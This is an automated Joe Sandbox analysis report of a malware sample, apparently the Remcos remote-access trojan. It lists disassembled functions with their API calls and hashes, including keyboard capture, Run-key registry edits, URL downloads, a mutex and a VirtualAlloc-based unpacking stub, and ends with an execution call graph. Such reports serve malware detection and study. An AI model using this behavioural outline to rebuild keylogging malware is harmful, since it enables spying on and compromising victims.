                                                  Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID: T=G$T=G
                                                  • API String ID: 3519838083-3732185208
                                                  • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                  • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                  Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                    • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                    • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                    • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                    • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                    • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(00000000,?,00000000,0040A91C,00000000), ref: 00409D84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: fabf8009bc8052d854f4165284eb6e136b80ba41f48a7cdcd541ad1136e697fa
                                                  • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                  • Opcode Fuzzy Hash: fabf8009bc8052d854f4165284eb6e136b80ba41f48a7cdcd541ad1136e697fa
                                                  • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                  Function 0210A199 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0210A1CB
                                                  • Sleep.KERNEL32(00002710), ref: 0210A1E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HandleLocalModuleSleepTime
                                                  • String ID: `#v
                                                  • API String ID: 1683243174-272240289
                                                  • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                  • Instruction ID: ed028a636a5f5b03d60b220f16c3d02d241774bf2f62fb3d240cc237d925bc64
                                                  • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                  • Instruction Fuzzy Hash: B7E01226B9431437552033AA7C4EC6F3D29EAC2B6174100BAFB0596195ED4008119AFB
                                                  Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00448825
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID: `@$`@
                                                  • API String ID: 1353095263-20545824
                                                  • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                  • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                  • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                  • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                  Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 1070bbf3275b1229c1c7efbb4f5439c97c9f3804cf481e3ede6732aa45a47047
                                                  • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                  • Opcode Fuzzy Hash: 1070bbf3275b1229c1c7efbb4f5439c97c9f3804cf481e3ede6732aa45a47047
                                                  • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                  Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                  • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                  Function 02102BE1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,020FC5A3,00000000,?,00000000), ref: 02102BEF
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 02102BFF
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02102BED
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction ID: 9ffaf82c64c481336881d4aac8b9a43ad9b9b93ce027c2a229cd68330e4f33e1
                                                  • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction Fuzzy Hash: B6E01270240308BAEF104FA1AD4AF9B37ACEB41B89F004164F902E50D1D3B5D904AA54
                                                  Function 020FC13E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,020FDC11,0000000D,00000033,00000000,00000032,00000000,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 020FC14D
                                                  • GetLastError.KERNEL32 ref: 020FC158
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: Rmc-I7G983
                                                  • API String ID: 1925916568-3173645232
                                                  • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction ID: cba1f3d4defd99d7a4475c523711288308af749f3589a7980429a1828ffaaad4
                                                  • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction Fuzzy Hash: A3D012717483019BD7281B747D897693555E784703F004079B60FC59D1CF648840A915
                                                  Function 020F1697 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(0046BA90,0046BA80), ref: 020F16A1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 020F16A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: `#v
                                                  • API String ID: 1646373207-272240289
                                                  • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                  • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                  • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                  • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                  Function 0044E0EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: h'X
                                                  • API String ID: 3253501508-116402217
                                                  • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                  • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                                  • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                  • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                                  Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                  • GetLastError.KERNEL32 ref: 0043FB02
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                  • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                  • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                  • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759
                                                  Function 0212FCC5 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,020F1D3F), ref: 0212FD5B
                                                  • GetLastError.KERNEL32 ref: 0212FD69
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0212FDC4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: 51d5f03fba1b172d5651f1593246994e43d26d1415dc77cb91aa80c4233d165d
                                                  • Instruction ID: d165237888af6859c0015164204ef0198f337930bf2e3eed997c50a1035b7301
                                                  • Opcode Fuzzy Hash: 51d5f03fba1b172d5651f1593246994e43d26d1415dc77cb91aa80c4233d165d
                                                  • Instruction Fuzzy Hash: 8A415E3564032AAFCF268F64C844BBA7BB5EF01324F25416DF85957691EB318827CB50

                                                  Execution Graph

                                                  Execution Coverage:2.4%
                                                  Dynamic/Decrypted Code Coverage:22.8%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:1367
                                                  Total number of Limit Nodes:55
                                                  execution_graph 86926 41d4d0 86928 41d4e6 ctype ___scrt_fastfail 86926->86928 86927 41d6e3 86932 41d734 86927->86932 86942 41d071 RtlDeleteCriticalSection RtlEnterCriticalSection RtlLeaveCriticalSection ___scrt_fastfail 86927->86942 86928->86927 86930 431f99 21 API calls 86928->86930 86935 41d696 ___scrt_fastfail 86930->86935 86931 41d6f4 86931->86932 86933 41d760 86931->86933 86943 431f99 86931->86943 86933->86932 86951 41d474 21 API calls ___scrt_fastfail 86933->86951 86935->86932 86937 431f99 21 API calls 86935->86937 86940 41d6be ___scrt_fastfail 86937->86940 86938 41d72d ___scrt_fastfail 86938->86932 86948 43264f 86938->86948 86940->86932 86941 431f99 21 API calls 86940->86941 86941->86927 86942->86931 86944 431fa3 86943->86944 86945 431fa7 86943->86945 86944->86938 86952 43a88c 86945->86952 86961 43256f 86948->86961 86950 432657 86950->86933 86951->86932 86957 446aff _strftime 86952->86957 86953 446b3d 86960 445354 20 API calls _free 86953->86960 86955 446b28 RtlAllocateHeap 86956 431fac 86955->86956 86955->86957 86956->86938 86957->86953 86957->86955 86959 442200 7 API calls 2 library calls 86957->86959 86959->86957 86960->86956 86962 432588 86961->86962 86966 43257e 86961->86966 86963 431f99 21 API calls 86962->86963 86962->86966 86964 4325a9 86963->86964 86964->86966 86967 43293a CryptAcquireContextA 86964->86967 86966->86950 86968 432956 86967->86968 86969 43295b CryptGenRandom 86967->86969 86968->86966 86969->86968 86970 432970 CryptReleaseContext 86969->86970 86970->86968 86971 426030 86976 4260f7 recv 86971->86976 86977 426091 86982 42610e send 86977->86982 86983 425e56 86984 425e6b 86983->86984 86990 425f0b 86983->86990 86985 425f25 86984->86985 86986 425f5a 86984->86986 86987 425eb9 86984->86987 86988 425f77 86984->86988 86989 425f9e 86984->86989 86984->86990 86996 425eee 86984->86996 87011 424354 48 API calls ctype 86984->87011 86985->86986 86985->86990 87014 41f075 52 API calls 86985->87014 86986->86988 87015 424b7b 21 API calls 86986->87015 86987->86990 86987->86996 87012 41f075 52 API calls 86987->87012 86988->86989 86988->86990 86999 424f78 86988->86999 86989->86990 87016 4255c7 28 API calls 86989->87016 86996->86985 86996->86990 87013 424354 48 API calls ctype 86996->87013 87000 424f97 ___scrt_fastfail 86999->87000 87002 424fa6 87000->87002 87006 424fcb 87000->87006 87017 41e097 21 API calls 87000->87017 87002->87006 87010 424fab 87002->87010 87018 41fad4 45 API calls 87002->87018 87005 424fb4 87005->87006 87020 424185 21 API calls 2 library calls 87005->87020 87006->86989 87008 42504e 87008->87006 87009 431f99 21 API calls 87008->87009 87009->87010 87010->87005 87010->87006 87019 41cf6e 48 API calls 87010->87019 87011->86987 87012->86987 87013->86985 87014->86985 87015->86988 87016->86990 87017->87002 87018->87008 87019->87005 87020->87006 87021 403947 87022 403959 87021->87022 87052 403b60 87022->87052 87027 401fbd 28 API calls 87028 40398a 87027->87028 87059 41afc3 87028->87059 87031 4039ab 87080 401d64 87031->87080 87032 40399e 87033 4039a4 87032->87033 87034 4039ef 87032->87034 87089 403a10 96 API calls 87033->87089 87091 401d8c 87034->87091 87038 4039b6 87085 401ebd 87038->87085 87039 4039f8 87097 401eea 87039->87097 87040 4039a9 87040->87034 87044 403a01 87046 401eea 11 API calls 87044->87046 87045 401d64 28 API calls 87047 4039d8 87045->87047 87048 403a09 87046->87048 87049 401fbd 28 API calls 87047->87049 87050 4039e0 87049->87050 87090 404468 61 API calls ctype 87050->87090 87101 403c30 87052->87101 87055 401fbd 87056 401fcc 87055->87056 87122 402501 87056->87122 87058 401fea 87058->87027 87079 41afd6 87059->87079 87060 41b046 87061 401eea 11 API calls 87060->87061 87062 41b078 87061->87062 87064 401eea 11 API calls 87062->87064 87063 41b048 87065 403b60 28 API calls 87063->87065 87067 41b080 87064->87067 87068 41b054 87065->87068 87066 403b60 28 API calls 87066->87079 87069 401eea 11 API calls 87067->87069 87071 401eef 11 API calls 87068->87071 87070 403993 87069->87070 87070->87031 87070->87032 87073 41b05d 87071->87073 87074 401eea 11 API calls 87073->87074 87076 41b065 87074->87076 87075 401eea 11 API calls 87075->87079 87132 41bfa9 28 API calls 87076->87132 87079->87060 87079->87063 87079->87066 87079->87075 87127 401eef 87079->87127 87131 41bfa9 28 API calls 87079->87131 87081 401d6c 87080->87081 87083 401d74 87081->87083 87134 401fff 28 API calls 87081->87134 87083->87038 87084 401d8b 87087 401ec9 87085->87087 87086 401ee4 87086->87045 87087->87086 87088 402325 28 API calls 87087->87088 87088->87086 87089->87040 87090->87034 87092 40200a 87091->87092 87096 40203a 87092->87096 87135 402654 11 API calls 87092->87135 87094 40202b 87136 4026ba 11 API calls _Deallocate 87094->87136 87096->87039 87098 4021b9 87097->87098 87099 4021e8 87098->87099 87137 40262e 11 API calls _Deallocate 87098->87137 87099->87044 87102 403c39 87101->87102 87105 403c59 87102->87105 87106 403c68 87105->87106 87111 4032a4 87106->87111 87108 403c74 87116 402325 87108->87116 87110 40396c 87110->87055 87112 4032b0 87111->87112 87113 4032ad 87111->87113 87120 4032b6 22 API calls 87112->87120 87113->87108 87117 40232f 87116->87117 87119 40233a 87117->87119 87121 40294a 28 API calls 87117->87121 87119->87110 87121->87119 87123 40250d 87122->87123 87125 40252b 87123->87125 87126 40261a 28 API calls 87123->87126 87125->87058 87126->87125 87128 401efe 87127->87128 87130 401f0a 87128->87130 87133 4021b9 11 API calls 87128->87133 87130->87079 87131->87079 87132->87060 87133->87130 87134->87084 87135->87094 87136->87096 87137->87099 87138 75003c 87139 750049 87138->87139 87153 750e0f SetErrorMode SetErrorMode 87139->87153 87144 750265 87145 7502ce VirtualProtect 87144->87145 87147 75030b 87145->87147 87146 750439 VirtualFree 87151 7504be 87146->87151 87152 7505f4 LoadLibraryA 87146->87152 87147->87146 87148 7504e3 LoadLibraryA 87148->87151 87150 7508c7 87151->87148 87151->87152 87152->87150 87154 750223 87153->87154 87155 750d90 87154->87155 87156 750dad 87155->87156 87157 750dbb GetPEB 87156->87157 87158 750238 VirtualAlloc 87156->87158 87157->87158 87158->87144 87159 43a998 87162 43a9a4 _swprintf __FrameHandler3::FrameUnwindToState 87159->87162 87160 43a9b2 87175 445354 20 API calls _free 87160->87175 87162->87160 87163 43a9dc 87162->87163 87170 444acc RtlEnterCriticalSection 87163->87170 87165 43a9b7 __fread_nolock 87166 43a9e7 87171 43aa88 87166->87171 87170->87166 87173 43aa96 87171->87173 87172 43a9f2 87176 43aa0f RtlLeaveCriticalSection std::_Lockit::~_Lockit 87172->87176 87173->87172 87177 448416 36 API calls 2 library calls 87173->87177 87175->87165 87176->87165 87177->87173 87178 414dba 87193 41a51b 87178->87193 87180 414dc3 87181 401fbd 28 API calls 87180->87181 87182 414dd2 87181->87182 87203 404468 61 API calls ctype 87182->87203 87184 414dde 87185 4161f2 87184->87185 87186 401eea 11 API calls 87184->87186 87187 401d8c 11 API calls 87185->87187 87186->87185 87188 4161fb 87187->87188 87189 401eea 11 API calls 87188->87189 87190 416207 87189->87190 87191 401eea 11 API calls 87190->87191 87192 416213 87191->87192 87194 41a529 87193->87194 87195 43a88c ___std_exception_copy 21 API calls 87194->87195 87196 41a533 InternetOpenW InternetOpenUrlW 87195->87196 87197 41a55c InternetReadFile 87196->87197 87201 41a57f 87197->87201 87199 41a5ac InternetCloseHandle InternetCloseHandle 87200 41a5be 87199->87200 87200->87180 87201->87197 87201->87199 87202 401eea 11 API calls 87201->87202 87204 401f86 87201->87204 87202->87201 87203->87184 87205 401f8e 87204->87205 87206 402325 28 API calls 87205->87206 87207 401fa4 87206->87207 87207->87201 87208 42ea1e 87209 42ea29 87208->87209 87211 42ea3d 87209->87211 87212 431fc3 87209->87212 87213 431fd2 87212->87213 87214 431fce 87212->87214 87216 43fcda 87213->87216 87214->87211 87217 44b9be 87216->87217 87218 44b9d6 87217->87218 87219 44b9cb 87217->87219 87221 44b9de 87218->87221 87227 44b9e7 _strftime 87218->87227 87235 446aff 21 API calls 3 library calls 87219->87235 87229 446ac5 87221->87229 87223 44ba11 RtlReAllocateHeap 87225 44b9d3 87223->87225 87223->87227 87224 44b9ec 87236 445354 20 API calls _free 87224->87236 87225->87214 87227->87223 87227->87224 87237 442200 7 API calls 2 library calls 87227->87237 87230 446ad0 RtlFreeHeap 87229->87230 87231 446af9 _free 87229->87231 87230->87231 87232 446ae5 87230->87232 87231->87225 87238 445354 20 API calls _free 87232->87238 87234 446aeb GetLastError 87234->87231 87235->87225 87236->87225 87237->87227 87238->87234 87239 4339be 87240 4339ca __FrameHandler3::FrameUnwindToState 87239->87240 87271 4336b3 87240->87271 87242 4339d1 87243 433b24 87242->87243 87247 4339fb 87242->87247 87569 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 87243->87569 87245 433b2b 87570 4426be 28 API calls _abort 87245->87570 87248 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 87247->87248 87563 4434d1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 87247->87563 87256 433a9b 87248->87256 87565 43edf4 35 API calls 3 library calls 87248->87565 87249 433b31 87571 442670 28 API calls _abort 87249->87571 87252 433a14 87254 433a1a 87252->87254 87564 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 87252->87564 87253 433b39 87282 433c5e 87256->87282 87265 433abd 87265->87245 87266 433ac1 87265->87266 87267 433aca 87266->87267 87567 442661 28 API calls _abort 87266->87567 87568 433842 13 API calls 2 library calls 87267->87568 87270 433ad2 87270->87254 87272 4336bc 87271->87272 87572 433e0a IsProcessorFeaturePresent 87272->87572 87274 4336c8 87573 4379ee 10 API calls 3 library calls 87274->87573 87276 4336cd 87277 4336d1 87276->87277 87574 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 87276->87574 87277->87242 87279 4336da 87280 4336e8 87279->87280 87575 437a17 8 API calls 3 library calls 87279->87575 87280->87242 87576 436050 87282->87576 87285 433aa1 87286 443422 87285->87286 87578 44ddc9 87286->87578 87288 433aaa 87291 40d767 87288->87291 87289 44342b 87289->87288 87582 44e0d3 35 API calls 87289->87582 87584 41bce3 LoadLibraryA GetProcAddress 87291->87584 87293 40d783 GetModuleFileNameW 87589 40e168 87293->87589 87295 40d79f 87296 401fbd 28 API calls 87295->87296 87297 40d7ae 87296->87297 87298 401fbd 28 API calls 87297->87298 87299 40d7bd 87298->87299 87300 41afc3 28 API calls 87299->87300 87301 40d7c6 87300->87301 87604 40e8bd 87301->87604 87303 40d7cf 87304 401d8c 11 API calls 87303->87304 87305 40d7d8 87304->87305 87306 40d835 87305->87306 87307 40d7eb 87305->87307 87309 401d64 28 API calls 87306->87309 87975 40e986 111 API calls 87307->87975 87311 40d845 87309->87311 87310 40d7fd 87312 401d64 28 API calls 87310->87312 87313 401d64 28 API calls 87311->87313 87316 40d809 87312->87316 87314 40d864 87313->87314 87608 404cbf 87314->87608 87976 40e937 65 API calls 87316->87976 87317 40d873 87612 405ce6 87317->87612 87320 40d87f 87322 401eef 11 API calls 87320->87322 87321 40d824 87977 40e155 65 API calls 87321->87977 87324 40d88b 87322->87324 87325 401eea 11 API calls 87324->87325 87326 40d894 87325->87326 87328 401eea 11 API calls 87326->87328 87327 401eea 11 API calls 87329 40dc9f 87327->87329 87330 40d89d 87328->87330 87566 433c94 GetModuleHandleW 87329->87566 87331 401d64 28 API calls 87330->87331 87332 40d8a6 87331->87332 87333 401ebd 28 API calls 87332->87333 87334 40d8b1 87333->87334 87335 401d64 28 API calls 87334->87335 87336 40d8ca 87335->87336 87337 401d64 28 API calls 87336->87337 87339 40d8e5 87337->87339 87338 40d946 87340 401d64 28 API calls 